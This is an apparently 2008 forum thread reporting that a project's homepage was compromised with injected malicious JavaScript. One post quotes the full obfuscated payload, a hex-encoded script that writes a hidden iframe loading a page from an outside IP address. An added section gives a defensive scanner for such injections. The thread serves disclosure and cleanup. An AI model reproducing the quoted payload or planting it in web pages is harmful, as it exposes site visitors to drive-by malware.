
homepage has a javascript virus / trojan

Posted: Wed Apr 23, 2008 6:32 pm
by hugh2
View the source of http://www.dvbdream.org/index.php

Look down at the bottom, there is some javascript which is encoded / obfuscated. If you save the homepage as an HTML file and submit it to VirusTotal, 9 programs detect it as malware. (They give different names for it, e.g. JS/Psyme.QM, Trojan.Clicker.HTML.IFrame.AR, JS/Agent.H1 etc.)

I emailed rreloc (at yahoo dot com - this is the author's address, right?) regarding this 4 days ago and have so far received no response.

Does anyone know why he chooses to remain anonymous?

[edited to remove author's literal email address]

Posted: Wed Apr 23, 2008 6:55 pm
by genpix
Please remove the e-mail address from the post :twisted:
You may publish your own if you wish.
But it's a common rule of all forums: NO e-mail addresses.
Crawling robots find these addresses and then tons of SPAM go there.

Posted: Thu Apr 24, 2008 12:27 am
by rel
Um, that's weird, :? I'll check it.

Posted: Thu Apr 24, 2008 8:08 am
by saentist
For more than a week
I have seen this

in the Kaspersky forum

Code:

function v4801fb955f010(v4801fb955f809){ function v4801fb9560001 () {var v4801fb95607f7=16; return v4801fb95607f7;} return(parseInt(v4801fb955f809,v4801fb9560001()));}
function v4801fb9560ff0(v4801fb95617e9){ var v4801fb9561ffb='';for(v4801fb956299e=0; v4801fb956299e<v4801fb95617e9.length; v4801fb956299e+=2){ v4801fb9561ffb+=(String.fromCharCode(v4801fb955f010(v4801fb95617e9.substr(v4801fb956299e, 2))));}return v4801fb9561ffb;}
document.write(v4801fb9560ff0('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D3237623234393633207372633D5C27687474703A2F2F37372E3232312E3133332E3139302F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A313735343734292B2766633334396331623631305C2720776964746683D333937206865696768743D343432207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));<
This is in the source of the page.

Also check for links like this:

Code:

<script language='javascript' src='http://127.0.0.1:1025/js.cgi?a&r=41'></script>
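
Added example, not part of the original thread: a static check that finds hex-encoded literals like the one quoted above in saved page source, decodes them as data without executing anything, and reports any iframe they write. The function names and the sample page (placeholder host injected.example.invalid) are constructed for illustration.

```javascript
// Added example: static triage of hex-obfuscated document.write() injections.
// Page content is only decoded as data; nothing from it is evaluated.

// Quoted literals made only of hex byte pairs (20 or more bytes).
function findHexLiterals(source) {
  const re = /(['"])((?:[0-9A-Fa-f]{2}){20,})\1/g;
  return Array.from(source.matchAll(re), (m) => m[2]);
}

// Two hex digits per character, the same scheme as the decoder in the thread.
function decodeHex(hex) {
  let out = '';
  for (let i = 0; i < hex.length; i += 2) {
    out += String.fromCharCode(parseInt(hex.slice(i, i + 2), 16));
  }
  return out;
}

// Decode every hex literal and report the ones that write an iframe.
function scanPage(source) {
  const findings = [];
  for (const hex of findHexLiterals(source)) {
    const decoded = decodeHex(hex);
    const tag = /<iframe\b[^>]*>/i.exec(decoded);
    if (!tag) continue;
    const src = /\bsrc\s*=\s*\\?['"]?([^'"\\\s>]+)/i.exec(tag[0]);
    const hidden = /display\s*:\s*none|visibility\s*:\s*hidden/i.test(tag[0]) ||
      /\b(?:width|height)\s*=\s*\\?['"]?[01]\b/i.test(tag[0]);
    findings.push({ src: src ? src[1] : null, hidden, decoded });
  }
  return findings;
}

// Constructed sample (not the payload from the thread): a page with an
// appended script that writes a hidden iframe to a placeholder host.
function toHex(s) {
  return Array.from(s, (c) => c.charCodeAt(0).toString(16).padStart(2, '0'))
    .join('').toUpperCase();
}
const inner = "<SCRIPT>document.write('<iframe src=\\'http://injected.example.invalid/go.html\\'" +
  " width=397 height=442 style=\\'display: none\\'></iframe>')</SCRIPT>";
const samplePage = '<html><body>Home</body></html>\n' +
  "<script>function d(h){/* decoder omitted */}document.write(d('" + toHex(inner) + "'));</script>";

for (const f of scanPage(samplePage)) {
  console.log(f.hidden ? 'HIDDEN iframe ->' : 'iframe ->', f.src);
}
```

A literal that decodes to something other than an iframe (a quoted hash, for instance) is ignored, so the check can be run over every file in a web root after a cleanup to confirm nothing was re-injected.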

Posted: Fri Apr 25, 2008 1:41 am
by rel
Fixed, still trying to find out what security weakness caused that on the site.

Posted: Fri Apr 25, 2008 2:48 am
by saentist
The problem is somewhere on the host storage part, not exactly on your page.
Mainly an Apache problem.

Edit:
The problem continues
with new

Posted: Fri Apr 25, 2008 10:29 am
by Snuffer
Just 2 minutes ago I had it with NOD32, Trojan too